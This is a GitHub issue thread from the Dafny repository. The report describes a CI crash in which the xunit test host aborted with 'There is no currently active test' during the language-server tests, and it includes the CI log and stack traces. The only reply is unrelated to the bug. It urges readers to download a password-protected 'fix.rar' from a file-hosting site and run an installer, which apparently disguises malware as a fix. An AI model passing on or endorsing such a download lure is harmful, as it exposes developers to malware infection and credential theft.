### ISSUE TITLE
Build CI issue: no currently active test

### ISSUE THREAD

**Issue by RustanLeino** [dafny-lang/dafny#5723]
### Dafny version

master branch, 26 Aug 2024

### Code to produce this issue

```dafny
CI failed, see https://github.com/dafny-lang/dafny/actions/runs/10567128139/job/29275432029?pr=5495
```

### Command to run and resulting output

```code
Run ##  Note that, for some mysterious reason, --collect doesn't work with the DafnyLanguageServer.Test package
  ##  Note that, for some mysterious reason, --collect doesn't work with the DafnyLanguageServer.Test package
  dotnet coverage collect -o DafnyLanguageServer.Test.coverage dotnet test --no-restore --blame-hang-timeout 360s --logger "console;verbosity=normal" --logger trx Source/DafnyLanguageServer.Test
  shell: C:\Program Files\PowerShell\7\pwsh.EXE -command ". '{0}'"
  env:
    solutionPath: Source/Dafny.sln
    z3BaseUri: https://github.com/dafny-lang/solver-builds/releases/download/snapshot-2024-04-10
    Logging__LogLevel__Microsoft: Debug
    DOTNET_ROOT: C:\Program Files\dotnet

...

Unhandled exception. System.InvalidOperationException: There is no currently active test.
   at Xunit.Sdk.TestOutputHelper.GuardInitialized() in /_/src/xunit.execution/Sdk/Frameworks/TestOutputHelper.cs:line 51
   at Xunit.Sdk.TestOutputHelper.QueueTestOutput(String output) in /_/src/xunit.execution/Sdk/Frameworks/TestOutputHelper.cs:line 66
   at DafnyCore.Test.WriterFromOutputHelper.WriteLine(String value) in D:\a\dafny\dafny\dafny\Source\DafnyCore.Test\WriterFromOutputHelper.cs:line 28
   at Microsoft.Boogie.SMTLib.SMTLibProcessTheoremProver.HandleProverError(String s)
   at Microsoft.Boogie.SMTLib.SMTLibProcess.HandleError(String msg)
   at Microsoft.Boogie.SMTLib.SMTLibProcess.SolverErrorDataReceived(Object sender, DataReceivedEventArgs e)
   at System.Diagnostics.AsyncStreamReader.FlushMessageQueue(Boolean rethrowInNewThread)
--- End of stack trace from previous location ---
   at System.Diagnostics.AsyncStreamReader.<>c.<FlushMessageQueue>b__18_0(Object edi)
   at System.Threading.QueueUserWorkItemCallback.<>c.<.cctor>b__6_0(QueueUserWorkItemCallback quwi)
   at System.Threading.ExecutionContext.RunForThreadPoolUnsafe[TState](ExecutionContext executionContext, Action`1 callback, TState& state)
   at System.Threading.QueueUserWorkItemCallback.Execute()
   at System.Threading.ThreadPoolWorkQueue.Dispatch()
   at System.Threading.PortableThreadPool.WorkerThread.WorkerThreadStart()
  Passed Microsoft.Dafny.LanguageServer.IntegrationTest.Synchronization.TextReplacementTest.RemoveCompleteDocumentContent [< 1 ms]
  Passed Microsoft.Dafny.LanguageServer.IntegrationTest.MultipleFilesNoProjectTest.OpenUpdateCloseIncludedFile [147 ms]
  Passed Microsoft.Dafny.LanguageServer.IntegrationTest.Various.PluginsTestWithVerification.EnsureItIsPossibleToLoadAPluginAndContinueVerification [134 ms]
info: default[0]
      Waited for 7 seconds for new notification.
Last received notification was CompilationStatusParams {
        Uri = file:///d:/a/dafny/dafny/dafny/Source/DafnyLanguageServer.Test/bin/Debug/net6.0/vinfggn0.b3r/dfyconfig.toml,
        Version = 1,
        Status = ResolutionStarted
      }
The active test run was aborted. Reason: Test host process crashed : Unhandled exception. System.InvalidOperationException: There is no currently active test.
   at Xunit.Sdk.TestOutputHelper.GuardInitialized() in /_/src/xunit.execution/Sdk/Frameworks/TestOutputHelper.cs:line 51
   at Xunit.Sdk.TestOutputHelper.QueueTestOutput(String output) in /_/src/xunit.execution/Sdk/Frameworks/TestOutputHelper.cs:line 66
   at DafnyCore.Test.WriterFromOutputHelper.WriteLine(String value) in D:\a\dafny\dafny\dafny\Source\DafnyCore.Test\WriterFromOutputHelper.cs:line 28
   at Microsoft.Boogie.SMTLib.SMTLibProcessTheoremProver.HandleProverError(String s)
   at Microsoft.Boogie.SMTLib.SMTLibProcess.HandleError(String msg)
   at Microsoft.Boogie.SMTLib.SMTLibProcess.SolverErrorDataReceived(Object sender, DataReceivedEventArgs e)
   at System.Diagnostics.AsyncStreamReader.FlushMessageQueue(Boolean rethrowInNewThread)
--- End of stack trace from previous location ---
   at System.Diagnostics.AsyncStreamReader.<>c.<FlushMessageQueue>b__18_0(Object edi)
   at System.Threading.QueueUserWorkItemCallback.<>c.<.cctor>b__6_0(QueueUserWorkItemCallback quwi)
   at System.Threading.ExecutionContext.RunForThreadPoolUnsafe[TState](ExecutionContext executionContext, Action`1 callback, TState& state)
   at System.Threading.QueueUserWorkItemCallback.Execute()
   at System.Threading.ThreadPoolWorkQueue.Dispatch()
   at System.Threading.PortableThreadPool.WorkerThread.WorkerThreadStart()


Test Run Aborted.
Total tests: Unknown
     Passed: 513
    Skipped: 7
 Total time: 5.9510 Minutes
Results File: D:\a\dafny\dafny\dafny\Source\DafnyLanguageServer.Test\TestResults\runneradmin_fv-az1201-857_2024-08-26_21_01_40.trx


The active Test Run was aborted because the host process exited unexpectedly. Please inspect the call stack above, if available, to get more information about where the exception originated from.
The test running when the crash occurred: 
Microsoft.Dafny.LanguageServer.IntegrationTest.ProjectFiles.SolverOptionsTest.DisableNonLinearArithmeticIsUsed

This test may, or may not be the source of the crash.

Attachments:
  D:\a\dafny\dafny\dafny\Source\DafnyLanguageServer.Test\TestResults\2f4cb448-5914-4366-a1e4-1cccb8c63abc\Sequence_9c064e4df1da46b3955ebee9601a37d2.xml
Code coverage results: DafnyLanguageServer.Test.coverage.
Error: Process completed with exit code 1.
```
```


### What happened?

CI failed with the error message "`Unhandled exception. System.InvalidOperationException: There is no currently active test.`"

### What type of operating system are you experiencing the problem on?

Other

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
